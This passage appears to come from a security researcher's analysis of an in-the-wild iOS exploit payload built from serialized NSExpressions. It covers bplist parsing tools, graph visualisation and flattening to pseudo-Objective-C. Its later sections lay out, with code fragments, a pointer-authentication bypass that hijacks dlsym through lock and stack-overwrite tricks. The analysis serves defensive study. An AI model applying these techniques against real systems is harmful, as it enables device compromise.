uid     1000 nnnn   ...     // nnnn+1 is # of bytes
        1001 xxxx           // unused
array   1010 nnnn   [int]   objref* // nnnn is count, unless '1111', then int count follows
        1011 xxxx           // unused
set     1100 nnnn   [int]   objref* // nnnn is count, unless '1111', then int count follows
dict    1101 nnnn   [int]   keyref* objref* // nnnn is count, unless '1111', then int count follows
        1110 xxxx           // unused
        1111 xxxx           // unused
```

It's a Type-Length-Value encoding with the type field in the upper nibble of the first byte. There's some subtlety to decoding the variable sizes correctly, but it's all explained fairly well in the CF code. The keyref* and objref* are indexes into the eventual array of deserialized objects; the bplist header defines the size of these references (so a small object with up to 256 objects could use a single byte as a reference.)

Parsing the bplist and printing it ends up with an object with this format:

```
dict {
  ascii("$top"):
    dict {
      ascii("root"):
        uid(0x1)
    }
  ascii("$version"):
    int(0x186a0)
  ascii("$objects"):
    array [
      [+0]:
        ascii("$null")
      [+1]:
        dict {
          ascii("NS.relative"):
            uid(0x3)
          ascii("WK.baseURL"):
            uid(0x3)
          ascii("$0"):
            int(0xe)
          ascii("$class"):
            uid(0x2)
        }
      [+2]:
        dict {
          ascii("$classes"):
            array [
              [+0]:
                ascii("WKSecureCodingURLWrapper")
              [+1]:
                ascii("NSURL")
              [+2]:
                ascii("NSObject")
            ]
          ascii("$classname"):
            ascii("WKSecureCodingURLWrapper")
        }
...
```

The top level object in this bplist is a dictionary with three entries:

 * $version: int(100000)
 * $top: uid(1)
 * $objects: an array of dictionaries

This is the top-level format for an NSKeyedArchiver. Indirection in NSKeyedArchivers is done using the uid type, where the values are integer indexes into the $objects array. (Note that this is an extra layer of indirection, on top of the keyref/objref indirection used at the bplist layer.)

The $top dictionary has a single key "root" with value uid(1) indicating that the object serialized by the NSKeyedArchiver is encoded as the second entry in the $objects array.

Each object encoded within the NSKeyedArchiver effectively consists of two dictionaries: one defining its properties and one defining its class. Tidying up the sample above (since dictionary keys are all ascii strings) the properties dictionary for the first object looks like this:

```
{
  NS.relative : uid(0x3)
  WK.baseURL  : uid(0x3)
  $0          : int(0xe)
  $class      : uid(0x2)
}
```

The $class key tells us the type of object which is serialized. Its value is uid(2) which means we need to go back to the objects array and find the dictionary at that index:

```
{
  $classname : "WKSecureCodingURLWrapper"
  $classes   : ["WKSecureCodingURLWrapper",
                "NSURL",
                "NSObject"]
}
```

Note that in addition to telling us the final class (WKSecureCodingURLWrapper) it also defines the inheritance hierarchy. The entire serialized object consists of a fairly enormous graph of these two types of dictionaries defining properties and types.

It shouldn't be a surprise to see WKSecureCodingURLWrapper here; we saw it right at the end of the first section.

### Finding the beginning

Since we have a custom parser we can start dumping out subsections of the object graph looking for the NSExpressions.
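Here is what such a parser can look like, as an added example written for this section rather than the post's own tooling: a reader for the bplist00 object formats listed above, plus the uid resolution and a follow() helper for the NSKeyedArchiver layer on top of it. The sample archive is constructed inline with Python's plistlib (which can emit bplist00 with uids) and shaped like the WKSecureCodingURLWrapper root object shown above; its URL string, indexes and property values are invented for the demonstration and are not from the exploit's payload. Unlike a quick analysis script it refuses out-of-range and cyclic objrefs, which is what you want when the input is untrusted.

```python
import plistlib
import struct

UID = plistlib.UID  # stdlib uid type; .data holds the index into $objects


def _be(buf, off, size):
    return int.from_bytes(buf[off:off + size], "big")


class BPlist:
    """Reader for the bplist00 object formats listed above (from CFBinaryPList.c)."""
    def __init__(self, data):
        if data[:8] != b"bplist00":
            raise ValueError("not a bplist00 blob")
        self.data, self._active = data, set()
        # 32-byte trailer: 6 unused/sort-version bytes, offset-int size, objref
        # size, object count, top object index, offset table start (big-endian).
        (self.offset_size, self.ref_size, self.num_objects,
         self.top, self.table_offset) = struct.unpack(">6xBBQQQ", data[-32:])

    def object_at(self, index):
        # Resolve an objref through the offsets table; refs are untrusted input.
        if index >= self.num_objects:
            raise ValueError(f"objref {index} out of range")
        if index in self._active:  # a container referencing itself would recurse forever
            raise ValueError(f"cyclic objref {index}")
        self._active.add(index)
        try:
            off = _be(self.data, self.table_offset + index * self.offset_size, self.offset_size)
            return self._parse(off)
        finally:
            self._active.discard(index)

    def _count(self, off, info):
        # Low nibble is the count unless 0b1111, in which case an int object follows.
        if info != 0xF:
            return info, off + 1
        marker = self.data[off + 1]
        if marker >> 4 != 0x1:
            raise ValueError("expected int marker after 0xF count nibble")
        n = 1 << (marker & 0xF)
        return _be(self.data, off + 2, n), off + 2 + n

    def _refs(self, start, count):
        return [_be(self.data, start + i * self.ref_size, self.ref_size) for i in range(count)]

    def _parse(self, off):
        d = self.data
        typ, info = d[off] >> 4, d[off] & 0xF
        if typ == 0x0:                      # null / false / true
            return {0x0: None, 0x8: False, 0x9: True}[info]
        if typ in (0x1, 0x2):               # int / real: 2^nnnn big-endian bytes
            n, raw = 1 << info, d[off + 1:off + 1 + (1 << info)]
            if typ == 0x1:
                return int.from_bytes(raw, "big", signed=n >= 8)
            return struct.unpack({4: ">f", 8: ">d"}[n], raw)[0]
        if typ in (0x4, 0x5, 0x6):          # data / ASCII string / UTF-16BE string
            count, start = self._count(off, info)
            if typ == 0x4:
                return bytes(d[start:start + count])
            if typ == 0x5:
                return d[start:start + count].decode("ascii")
            return d[start:start + 2 * count].decode("utf-16-be")
        if typ == 0x8:                      # uid: nnnn+1 bytes
            return UID(_be(d, off + 1, info + 1))
        if typ in (0xA, 0xC):               # array / set: count objrefs
            count, start = self._count(off, info)
            return [self.object_at(r) for r in self._refs(start, count)]
        if typ == 0xD:                      # dict: count keyrefs, then count objrefs
            count, start = self._count(off, info)
            keys = self._refs(start, count)
            vals = self._refs(start + count * self.ref_size, count)
            return {self.object_at(k): self.object_at(v) for k, v in zip(keys, vals)}
        raise ValueError(f"unsupported marker {d[off]:#04x} at offset {off:#x}")


class KeyedArchive:
    """Second indirection layer: $top/root and every $class are uids into $objects."""
    def __init__(self, top):
        self.objects, self.root = top["$objects"], top["$top"]["root"]

    def resolve(self, ref):
        return self.objects[ref.data] if isinstance(ref, UID) else ref

    def follow(self, start, path):
        """Walk property keys, resolving a uid at each step (like the post's follow())."""
        obj = self.resolve(start)
        for key in path:
            obj = self.resolve(obj[key])
        return obj


def build_sample():
    """Constructed archive shaped like the root object shown above (not the real payload)."""
    objects = ["$null",
               {"NS.relative": UID(3), "WK.baseURL": UID(3), "$0": 14, "$class": UID(2)},
               {"$classname": "WKSecureCodingURLWrapper",
                "$classes": ["WKSecureCodingURLWrapper", "NSURL", "NSObject"]},
               {"NS.relative": UID(5), "$class": UID(4)},
               {"$classname": "NSURL", "$classes": ["NSURL", "NSObject"]},
               "https://example.invalid/path"]
    top = {"$version": 100000, "$top": {"root": UID(1)}, "$objects": objects}
    return plistlib.dumps(top, fmt=plistlib.FMT_BINARY)
```

Usage: bp = BPlist(build_sample()); ka = KeyedArchive(bp.object_at(bp.top)); ka.follow(ka.root, ["NS.relative", "NS.relative"]) returns the inner URL string, and ka.follow(ka.root, ["$class"])["$classes"] returns the inheritance chain. The date marker (0x33) is left out since the sample never uses it; adding it is one more branch in _parse.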
In the end we can follow these properties to find an array of PTSection objects, each of which contains multiple PTRow objects, each with an associated condition in the form of an NSComparisonPredicate:

```python
sections = follow(root_obj, ['NS.relative', 'NS.relative', 'NS.configDict', 'NS.skkeyset', 'components', 'NS.objects'])
```

Each of those PTRows contains a single predicate to evaluate - in the end the relevant parts of the payload are contained entirely in four NSExpressions.

### Types

There are only a handful of primitive NSExpression family objects from which the graph is built:

 * NSComparisonPredicate (NSLeftExpression, NSRightExpression, NSPredicateOperator): evaluate the left and right side then return the result of comparing them with the given operator.
 * NSFunctionExpression (NSSelectorName, NSArguments, NSOperand): send the provided selector to the operand object passing the provided arguments, returning the return value.
 * NSConstantValueExpression (NSConstantValueClassName, NSConstantValue): a constant value or Class object.
 * NSVariableAssignmentExpression (NSAssignmentVariable, NSSubexpression): evaluate the NSSubexpression and assign its value to the named variable.
 * NSVariableExpression (NSVariable): return the value of the named variable.
 * NSCustomPredicateOperator (NSSelectorName): the name of a selector to invoke as a comparison operator.
 * NSTernaryExpression (NSPredicate, NSTrueExpression, NSFalseExpression): evaluate the predicate then evaluate either the true or false branch depending on the value of the predicate.

### E2BIG

The problem is that the object graph is simply enormous with very deep nesting. Attempts to perform simple transforms of the graph to a text representation quickly became incomprehensible with over 40 layers of nesting.

It's very unlikely that whoever crafted this serialized object actually wrote the entire payload as a single expression. Much more likely is that they used some tricks and tooling to turn a sequential series of operations into a single statement. But to figure those out we still need a better way to see what's going on.

### Going DOTty

This object is a graph - so rather than trying to immediately transform it to text why not try to visualize it as a graph instead?

[DOT](<https://graphviz.org/doc/info/lang.html>) is the graph description language used by [graphviz](<https://graphviz.org/>) - an open-source graph drawing package. It's pretty simple:

```dot
digraph {
  A -> B
  B -> C
  C -> A
}
```

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW_b7V-TsK6Oqr5OSPWT5-hZ5f_8pCrQjOEMVEjnZ1kD1RcrOuxZIcOzSXm-62KfzFotuExCGr2JmFyILYa9cW3OnG4HRBHr0CCC2y4jRcEEr6a_jDns_Bil4DDQpsZThUDilWcajsjKbh_eppltiSH0tnz-8ms907uDCsI7jAliAF6p2aehlhQPGmEEc/s1600/image11.png>)

You can also define nodes and edges separately and apply properties to them:

```dot
digraph {
  A [shape=square]
  B [label="foo"]
  A -> B
  B -> C
  C -> A [style=dotted]
}
```

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkJnjUKZ5OTep-zxMFYt4YG83L42A-SHhXtVqHQIAxuRhZ2VGCw6cRCHPerUUyTumT1ku6GvCXWIBv_2Zvq8qx_WdHCUsm2TC4bPQ2PIlNcHqJc8C4a-g5iQ7MER2l7N7qjlFdVeYxP_6ul4T3K-4HuChHKuCGsnD-rKQMTyJNUwsC04v9-2x2_O7slFU/s1600/image6.png>)

With the custom parser it's relatively easy to emit a dot representation of the entire NSExpression graph. But when it comes time to actually render it, progress is rather slow...

After leaving it overnight without success it seemed that perhaps a different approach again is required. Graphviz is certainly capable of rendering a graph with tens of thousands of nodes; the part which is likely failing is graphviz's attempt to lay out the nodes in a clean way.

### Medium data

Maybe some of the tools explicitly designed for interactively exploring significant datasets could help here. I chose to use [Gephi](<https://gephi.org/>), an open-source graph visualization platform.

I loaded the .dot file into Gephi and waited for the magic:

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5qT7qy0QbyqqVploNg4LelSnmX9dKZN52iWGEv1Qz4nuDOYnir2beUFJmT4rilB_LsctjwiFQu595S9UYlGPbk3YCMYJEPomUyHJdbicSBg3w8kw_iF6r8-GMpCBxvbmE3uZPbnWMUoQKLniJzpaj31PWV9S5FZWhtVntdjuh68fLW90Fs2lEgs_4gVM/s1600/image16.png>)

This might take some more work.

### Directing forces

The default layout seems to just position all the nodes equally in a square - not particularly useful. But using the layout menu on the left we can choose layouts which might give us some insight. Here's a force-directed layout, which emphasizes highly-connected nodes:

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha6DeZ1nYghaKEsUPjE1hwvAgrcxVdsLq9M9if7k45GVZGHNiVNn2LmJYzbebEaIEn3rTMKG8kXizodrwT3AU6OxwdTPnX0T56Q2NKZCtxdVJYSK7fWmF_W6dUySsZZ45jAoGG0bJGtvzOW1I9DpYx2Aa9mAGq0aG7NuMLXTbdtBDOZ8_MoZgvXN2Yw/s1600/image9.png>)

Much better! I then started to investigate which nodes have large in or out degrees and figure out why. For example, here we can see that a node with the label func:alloc has a huge in-degree.

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyyOoxrXmQdMZz-qFcUgmo76hHEwghN4Z5kzB_V3gf-tXsC2S8ZYFqLd1VcDuo5rM1h1eQ_f0jdzepAGKta-fc-vqmOFK1Y_E9lFQHjyvxrscPI9zZyJG5VWXBlOQ-fKpcUITbXZGH99Fas8g77dasgQmSgxtEswJEF2_IwZB5JNsO-mZywfbDsAzTOYs/s1600/image8.png>)

Trying to lay out the graph with nodes with such high in-degrees just leads to a mess (and was potentially what was slowing the graphviz tools down so much), so I started adding hacks to the custom parser to duplicate certain nodes while maintaining the semantics of the expression, in order to minimize the number of crossing edges in the graph.

During this iterative process I ended up creating the graph shown at the start of this writeup, when only a handful of high in-degree nodes remained and the rest separated cleanly into clusters:

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrzpTZ2_H16_OJgFkwuJNmL120zmxWCcdrLlPXp-6x5SsweX8PosbAcKI9Sf8Ad0bYlMfDGwJ0Rz5GdwwEVnek-taAR1voRObiCwl7StIIx2gIHw7zH16AOi-TJRNiyDYKXprNRQNmt6vosLtafQdbjrRgTJB7HLUt_qc1sfCG_sAWZk_wfsfaei3c2-4/s1600/image7.png>)

### Flattening

Although this created a large number of extra nodes in the graph, it turns out that this made things much easier for graphviz to lay out. It still can't do the whole graph, but we can now split it into chunks which successfully render to very large SVGs. The advantage of switching back to graphviz is that we can render arbitrary information with custom node and edge labels.
For example, using custom shape primitives to make the arrays of NSFunctionExpression arguments stand out more clearly:

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxSkoNTMqfudlBmWGUwZwiohNCIu8xpvOdBmB-hIRXLf7vSddvP0Ay6M8AfPZQNME_UzZHDSbE5Dofvlaap7gy3DdBTseXL7Dml-YW2wv9wBa3vjJ6Jt4_DtUNcTxV0AlG4QZBfgx4_1I6sDEa00vO-qPh-yPR8w1DRjnaGJEMMn4YeAvvGy6ul6fFXNE/s1566/image5.png>)

Here we can see nested related function calls, where the intention is clearly to pass the return value from one call as the argument to another. Starting in the bottom right of the graph shown above we can work backwards (towards the top left) to reconstruct pseudo-Objective-C:

```objc
[writeInvocationName
    getArgument:
        [ [_NSPredicateUtils
              bitwiseOr: [NSNumber numberWithUnsignedLongLong:
                             [intermediateAddress: bytes]]
                   with: @0x8000000000000000]] longLongValue ]
    atIndex: [@0x1 longLongValue] ]
```

We can also now clearly see the trick they use to execute multiple unrelated statements:

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipo1_BJVDoZY-HkSmQBs2EehlcTnWvTalheSR74itlEnLnW3OzGzx4Gk3AoFjVM1moihApNadCoaQzJXXCzAmvuXWCEMIAN210z1eu5wh50lHGBszL_UWIHchQ9mj7gXyDFVr9Y4Fk0TYtdv2YoT-cFqWK-BjL7S2lMzN4bVxi6KsFXX1PB3tw0BSfMS0/s1276/image10.png>)

Multiple unrelated expressions are evaluated sequentially by passing them as arguments to an NSFunctionExpression calling [NSNull alloc]. This is a method which takes no arguments and has no side-effects (the NSNull is a singleton and alloc returns a global pointer) but the NSFunctionExpression evaluation will still evaluate all the provided arguments then discard them.

They build a huge tree of these [NSNull alloc] nodes which allows them to sequentially execute unrelated expressions.

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy38GVNF5THf65qjWhTjOlzJixu9MiOpzLQ7I8vkZx93U2__h8ympN_kXbtAGx8Rm8438yTPzDjZjBNlTNLAoCThHD6FF7pbE3f5xDpMNOEjAsZQlLOey6chJ2oJn1rmsDD7IJjpInA9p-SlB_Y5P-qlN6Emh8DA2NkdPbxKWWn8TU4ceqOa7LLV95wyg/s1600/image2.png>)

### Connecting the dots

Since the return values of the evaluated arguments are discarded they use NSVariableExpressions to connect the statements semantically. These are a wrapper around an NSDictionary object which can be used to store named values. Using the custom parser we can see there are 218 different named variables. Interestingly, whilst the Mach-O is stripped and all symbols were removed, that's not the case for the NSVariables - we can see their full (presumably original) names.

### bplist_to_objc

Having figured out the NSNull trick they use for sequential expression evaluation it's now possible to flatten the graph to pseudo-Objective-C code, splitting each argument to an [NSNull alloc] NSFunctionExpression into separate statements:

```objc
id v_detachNewThreadWithBlock:_NSFunctionExpression = [NSNumber numberWithUnsignedLongLong:[[[NSFunctionExpression alloc] initWithTarget:@"target" selectorName:@"detachNewThreadWithBlock:" arguments:@[] ] selector] ];
```

This is getting closer to decompiler-type output. It's still a bit jumbled, but significantly more readable than the graph and can be refactored in a code editor.

### Helping out

The expressions make use of NSPredicateUtilities for arithmetic and bitwise operations.
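The two flattening steps described above (splitting [NSNull alloc] sequencers into separate statements and rewriting the _NSPredicateUtilities arithmetic selectors into readable helper calls), together with the node-duplication trick used to make the DOT rendering tractable in the Going DOTty and Flattening sections, as an added example that is not the post's own bplist_to_objc tooling. It assumes the keyed archive has already been resolved into plain nested dicts keyed by the NSExpression property names listed under Types; the small constructors, the "class" key, the set_msb/add helper names and the sample expressions (one variable assignment and one setArgument:atIndex: call) are all constructed for this demonstration rather than taken from the payload.

```python
# Node shape assumed here: a dict with a "class" key plus the property names the
# post lists for each NSExpression type (a real tool would produce these by
# resolving the keyed archive's uids first). Constructors build that shape inline.

def const(value):
    return {"class": "NSConstantValueExpression", "NSConstantValue": value}

def klass(name):
    return {"class": "NSConstantValueExpression", "NSConstantValueClassName": name}

def call(operand, selector, *args):
    return {"class": "NSFunctionExpression", "NSOperand": operand,
            "NSSelectorName": selector, "NSArguments": list(args)}

def var(name):
    return {"class": "NSVariableExpression", "NSVariable": name}

def assign(name, expr):
    return {"class": "NSVariableAssignmentExpression",
            "NSAssignmentVariable": name, "NSSubexpression": expr}

def sequence(*exprs):
    """[NSNull alloc] ignores its arguments, but NSFunctionExpression still
    evaluates each of them in order: the sequencing trick described above."""
    return call(klass("NSNull"), "alloc", *exprs)

def is_sequencer(node):
    return (node["class"] == "NSFunctionExpression" and node["NSSelectorName"] == "alloc"
            and node["NSOperand"].get("NSConstantValueClassName") == "NSNull")

HELPERS = {"add:to:": "add", "bitwiseOr:with:": "bitwise_or"}  # _NSPredicateUtilities selectors
MAX_DEPTH = 200  # the real graph nests 40+ levels deep; bound it instead of blowing the stack

def fmt_const(v):
    if isinstance(v, bool):
        return "@YES" if v else "@NO"
    return f"@{v:#x}" if isinstance(v, int) else f'@"{v}"'

def parse_expression(node, depth=0):
    """Render one subtree as pseudo-Objective-C, rewriting arithmetic into helpers."""
    if depth > MAX_DEPTH:
        raise RecursionError("expression nesting too deep")
    c, sub = node["class"], lambda k: parse_expression(node[k], depth + 1)
    if c == "NSConstantValueExpression":
        return node.get("NSConstantValueClassName") or fmt_const(node["NSConstantValue"])
    if c == "NSVariableExpression":
        return "v_" + node["NSVariable"]
    if c == "NSVariableAssignmentExpression":
        return f"id v_{node['NSAssignmentVariable']} = {sub('NSSubexpression')}"
    if c == "NSTernaryExpression":
        return f"({sub('NSPredicate')} ? {sub('NSTrueExpression')} : {sub('NSFalseExpression')})"
    if c == "NSComparisonPredicate":  # operator assumed to be an NSCustomPredicateOperator
        op = node["NSPredicateOperator"]["NSSelectorName"]
        return f"[{sub('NSLeftExpression')} {op}{sub('NSRightExpression')}]"
    if c != "NSFunctionExpression":
        raise ValueError(f"unknown node class {c}")
    sel = node["NSSelectorName"]
    args = [parse_expression(a, depth + 1) for a in node["NSArguments"]]
    if sel == "bitwiseOr:with:" and node["NSArguments"][1].get("NSConstantValue") == 1 << 63:
        return f"set_msb({args[0]})"  # OR-ing in the top bit: the post's set_msb()
    if sel in HELPERS:
        return f"{HELPERS[sel]}({', '.join(args)})"
    target = parse_expression(node["NSOperand"], depth + 1)
    if not args:
        return f"[{target} {sel}]"
    parts = sel.split(":")[:-1]  # "setArgument:atIndex:" -> ["setArgument", "atIndex"]
    return f"[{target} " + " ".join(f"{p}:{a}" for p, a in zip(parts, args)) + "]"

def flatten(node, out=None):
    """Split each [NSNull alloc] sequencer (recursively) into separate statements."""
    out = [] if out is None else out
    if is_sequencer(node):
        for arg in node["NSArguments"]:
            flatten(arg, out)
    else:
        out.append(parse_expression(node) + ";")
    return out

def children(node):
    c = node["class"]
    if c == "NSFunctionExpression":
        return [("operand", node["NSOperand"])] + [(f"arg{i}", a) for i, a in enumerate(node["NSArguments"])]
    if c == "NSVariableAssignmentExpression":
        return [("value", node["NSSubexpression"])]
    if c == "NSTernaryExpression":
        return [(k, node[k]) for k in ("NSPredicate", "NSTrueExpression", "NSFalseExpression")]
    if c == "NSComparisonPredicate":
        return [(k, node[k]) for k in ("NSLeftExpression", "NSRightExpression")]
    return []

def to_dot(root):
    """DOT for graphviz. Every visit mints a fresh node id, so a node reached twice
    (a sequencer, a class constant) is duplicated instead of becoming a fan-in hub."""
    lines, n = ["digraph {"], 0
    def walk(node):
        nonlocal n
        n += 1
        me, c = f"n{n}", node["class"]
        if c == "NSFunctionExpression":
            label = "func:" + node["NSSelectorName"]
        elif c == "NSConstantValueExpression":
            label = parse_expression(node).replace('"', '\\"')
        else:
            label = node.get("NSVariable") or node.get("NSAssignmentVariable") or c
        lines.append(f'  {me} [label="{label}"]')
        for edge, child in children(node):
            lines.append(f'  {me} -> {walk(child)} [label="{edge}"]')
        return me
    walk(root)
    return "\n".join(lines + ["}"])

def build_sample():
    """Constructed mini-payload in the same shape (not the real 437KB archive)."""
    utils = klass("_NSPredicateUtilities")  # one shared node: duplicated twice in the DOT output
    leak = assign("OOO_dyld_dyld", call(var("leak"), "longLongValue"))
    addr = call(utils, "bitwiseOr:with:",
                call(utils, "add:to:", var("OOO_dyld_dyld"), const(0xa0)),
                const(0x8000000000000000))
    store = call(var("dlsym_lock_ptrinvocation"), "setArgument:atIndex:",
                 call(addr, "longLongValue"), call(const(2), "longLongValue"))
    return sequence(leak, sequence(store))
```

Running flatten(build_sample()) yields two statements instead of one 20-node expression, the second one in the same shape as the set_msb(add(...)) line the post shows; to_dot(build_sample()) emits a tree in which the shared _NSPredicateUtilities constant appears twice, which is the duplication that keeps the graphviz layout from collapsing into a hub.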
Since we don't have to support arbitrary input, we can just hardcode the selectors which implement those operations and emit a more readable helper function call instead:\n\nif selector_str == 'bitwiseOr:with:':\n\narg_vals = follow(o, ['NSArguments', 'NS.objects'])\n\ns += 'set_msb(%s)' % parse_expression(arg_vals[0], depth+1)\n\nelif selector_str == 'add:to:':\n\narg_vals = follow(o, ['NSArguments', 'NS.objects'])\n\ns += 'add(%s, %s)' % (parse_expression(arg_vals[0], depth+1), parse_expression(arg_vals[1], depth+1))\n\nThis yields arithmetic statements which look like this:\n\n[v_dlsym_lock_ptrinvocation setArgument:[set_msb(add(v_OOO_dyld_dyld, @0xa0)) longLongValue] atIndex:[@0x2 longLongValue] ];\n\n### but...why?\n\nAfter all that we're left with around 1000 lines of sort-of readable pseudo-objective-C. There are a number of further tricks they use to implement things like arbitrary read and write which I manually replaced with simple assignment statements.\n\nThe attackers are already in a very strong position at this point; they can evaluate arbitrary NSExpressions, with the security bits disabled such that they can still allocate and interact with arbitrary classes. But in this case the attackers are determined to be able to call arbitrary functions, without being restricted to just Objective-C selector invocations.\n\nThe major barrier to doing this easily is PAC (pointer authentication.) The B-family PAC keys used for backwards-edge protection (e.g. 
return addresses on the stack) were always per-process, but the A-family keys (used for forward-edge protection of things like function pointers) used to be shared across all userspace processes, meaning any userspace task could forge signed forward-edge PAC'ed pointers which would be valid in other tasks.

With some low-level changes to the virtual memory code it's now possible for tasks to use private, isolated A-family keys as well, which means that the WebContent process can't necessarily forge forward-edge pointers that would authenticate in other tasks (like the GPU Process).

Most previous userspace PAC defeats involved finding a way for a forged forward-edge function pointer to be used across a privilege boundary, and when forward-edge keys were shared there were a great number of such primitives. Kernel PAC defeats tended to be slightly more involved, often targeting race conditions to create signing oracles or similar primitives. We'll see that the attackers took inspiration from those kernel PAC defeats here...

### Invoking Invocations with IMPs

An [NSInvocation](<https://developer.apple.com/documentation/foundation/nsinvocation>), as the name suggests, wraps up an Objective-C method call such that it can be called at a later point. Although conceptually in Objective-C you don't "call methods" but instead "pass messages to objects", in reality of course you do eventually end up at a branch instruction to the native code which implements the selector for the target object. It's also possible to cache the address of this native code as an IMP (it's really just a function pointer).

As outlined in the [see-no-eval NSExpression blogpost](<https://codecolor.ist/2021/01/16/see-no-eval-runtime-code-execution-objc/>), NSInvocations can be used to get instruction pointer control from NSExpressions, with the caveat that you must provide a signed PC value. 
The first method they call using this primitive is the implementation of [CFPrefsSource lock]:

; void __cdecl -[CFPrefsSource lock](CFPrefsSource *self, SEL)
ADD X0, X0, #0x34
B _os_unfair_lock_loc

That is, it adds 0x34 to self and tail-calls the unfair-lock routine on the resulting address; the SEL argument is not used. They get a signed (with PACIZA) IMP for this function by calling

id os_unfair_lock_0x34_IMP = [[CFPrefsSource alloc] methodForSelector: sel(lock)]

To call that function they use two nested NSInvocations, the outer one targeting the inner one:

id invocationInner = [templateInvocation copy];
[invocationInner setTarget:(dlsym_lock_ptr - 0x34)];
[invocationInner setSelector: [@0x43434343 longLongValue]];

id invocationOuter = [templateInvocation copy];
[invocationOuter setTarget: invocationInner];
[invocationOuter setSelector: sel(invokeUsingIMP)];
[invocationOuter setArgument: os_unfair_lock_0x34_IMP atIndex: @2];

They then call invoke on the outer invocation, which invokes the inner invocation via invokeUsingIMP:. Because invokeUsingIMP: bypasses the regular Objective-C selector-to-IMP lookup, this allows the [CFPrefsSource lock] implementation to be called on something which most certainly isn't a CFPrefsSource object: the "self" it receives is dlsym_lock_ptr - 0x34, so the ADD lands exactly on the dyld lock, and the 0x43434343 selector is just a placeholder.

### Lock what?

But what is that lock, and why are they locking it? 
That lock is used here inside dlsym:\n\n// dlsym() assumes symbolName passed in is same as in C source code\n\n// dyld assumes all symbol names have an underscore prefix\n\nBLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);\n\nunderscoredName[0] = '_';\n\nstrcpy(&underscoredName[1], symbolName);\n\n__block Diagnostics diag;\n\n__block Loader::ResolvedSymbol result;\n\nif ( handle == RTLD_DEFAULT ) {\n\n// magic \"search all in load order\" handle\n\n__block bool found = false;\n\nwithLoadersReadLock(^{\n\nfor ( const dyld4::Loader* image : loaded ) {\n\nif ( !image->hiddenFromFlat() && image->hasExportedSymbol(diag, *this, underscoredName, Loader::shallow, &result) ) {\n\nfound = true;\n\nbreak;\n\n}\n\n}\n\n});\n\nwithLoadersReadLock first takes the global lock which the invocation locked before evaluating the block which resolves the symbol:\n\nthis->libSystemHelpers->os_unfair_recursive_lock_lock_with_options(\n\n&(_locks.loadersLock),\n\nOS_UNFAIR_LOCK_NONE);\n\nwork();\n\nthis->libSystemHelpers->os_unfair_recursive_lock_unlock(\n\n&_locks.loadersLock);\n\nSo by taking this lock the NSExpression has ensured that any calls to dlsym in the GPU process will block waiting for this lock.\n\n### Threading the needle\n\nNext they use the same double-invocation trick to make the following Objective-C call:\n\n[NSThread detachNewThreadWithBlock:aBlock]\n\npassing as the block argument a pointer to a block inside the CoreGraphics library with the following body:\n\nvoid *__CGImageCreateWithPNGDataProvider_block_invoke_2()\n\n{\n\nvoid *sym;\n\nif ( CGLibraryLoadImageIODYLD_once != -1 ) {\n\ndispatch_once(&CGLibraryLoadImageIODYLD_once,\n\n&__block_literal_global_5_15015);\n\n}\n\nif ( !CGLibraryLoadImageIODYLD_handle ) {\n\n// fail\n\n}\n\nsym = dlsym(CGLibraryLoadImageIODYLD_handle,\n\n\"CGImageSourceGetType\");\n\nif ( !sym ) {\n\n// fail\n\n}\n\nCGImageCreateWithPNGDataProvider = sym;\n\nreturn sym;\n\n}\n\nPrior to starting the thread calling 
that block they also perform two arbitrary writes to set:\n\nCGLibraryLoadImageIODYLD_once = -1\n\nand \n\nCGLibraryLoadImageIODYLD.handle = RTLD_DEFAULT\n\nThis means that the thread running that block will reach the call to:\n\ndlsym(CGLibraryLoadImageIODYLD_handle,\n\n\"CGImageSourceGetType\");\n\nthen block inside the implementation of dlsym waiting to take a lock held by the NSExpression.\n\n### Sleep and repeat\n\nThey call [NSThread sleepForTimeInterval] to sleep on the NSExpression thread to ensure that the victim dlsym thread has started, then read the value of libpthread::___pthread_head, the start of a linked-list of pthreads representing all the running threads (the address of which was linked and rebased by the JS.)\n\nThey then use an unrolled loop of 100 NSTernaryExpressions to walk that linked list looking for the last entry (which has a null pthread.next field) which is the most recently-started thread.\n\nThey use a hardcoded offset into the pthread struct to find the thread's stack and create an NSData object wrapping the first page of the dlsym thread's stack:\n\nid v_stackData = [NSData dataWithBytesNoCopy:[set_msb(v_stackEnd) longLongValue] length:[@0x4000 longLongValue] freeWhenDone:[@0x0 longLongValue] ];\n\nRecall this code we saw earlier in the dlsym snippet:\n\n// dlsym() assumes symbolName passed in is same as in C source code\n\n// dyld assumes all symbol names have an underscore prefix\n\nBLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);\n\nunderscoredName[0] = '_';\n\nstrcpy(&underscoredName[1], symbolName);\n\nBLOCK_ACCESSIBLE_ARRAY is really creating an alloca-style local stack buffer in order to prepend an underscore to the symbol name, which explains why the NSExpression code does this next:\n\n[v_stackData rangeOfData:@\"b'_CGImageSourceGetType'\" options:[@0x0 longLongValue] range:[@0x0 longLongValue] [@0x4000 longLongValue] ]\n\nThis returns an NSRange object defining where the string 
\"_CGImageSourceGetType\" appears in that page of the stack. \"CGImageSourceGetType\" (without the underscore) is the hardcoded (and constant, in read-only memory) string which the block passes to dlsym.\n\nThe NSExpression then calculates the absolute address of that string on the thread stack and uses [NSData getBytes:length:] to write the contents of an NSData object containing the string \"_dlsym\\0\\0\" over the start of the \"_CGImageSourceGetType\" string on the blocked dlsym thread.\n\n### Unlock and go\n\nUsing the same tricks as before to lock the lock (but this time using the IMP of [CFPrefsSource unlock] they unlock the global lock blocking the dlsym thread. This causes the block to continue executing and dlsym to complete, now returning a PACIZA-signed function pointer to dlsym instead of CGImageSourceGetType.\n\nThe block then assigns the return value of that call to dlsym to a global variable:\n\nCGImageCreateWithPNGDataProvider = sym;\n\nThe NSExpression calls sleepForTimeInterval again to ensure that the block has completed, then reads that global variable to get a signed function pointer to dlsym!\n\n(It's worth noting that it used to be the case, as documented by Samuel Gro\u00df in his [iMessage remote exploit 